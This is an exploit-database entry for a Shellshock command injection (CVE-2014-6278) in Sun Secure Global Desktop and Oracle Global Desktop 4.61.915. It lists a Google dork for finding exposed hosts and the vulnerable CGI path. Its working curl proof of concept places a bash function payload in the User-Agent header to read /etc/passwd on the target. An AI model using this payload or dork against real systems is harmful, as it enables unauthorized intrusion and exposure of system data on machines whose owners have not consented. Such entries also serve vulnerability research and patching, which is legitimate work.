Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)

Author: lastc0de
type: webapps
platform: cgi
port: 80.0
date_added: 2016-06-06  
date_updated: 2017-11-15  
verified: 0  
codes: CVE-2014-6278  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 39887.txt  

# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop
# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client
# Date: 6/4/2016
# Exploit Author: lastc0de@outlook.com
# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html
# Version: 4.61.915
# Tested on: Linux

VULNERABLE FILE
http://target.com//tarantella/cgi-bin/modules.cgi

POC :
localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt

localhost@~#cat xixixi.txt
which will print out the content of /etc/passwd file.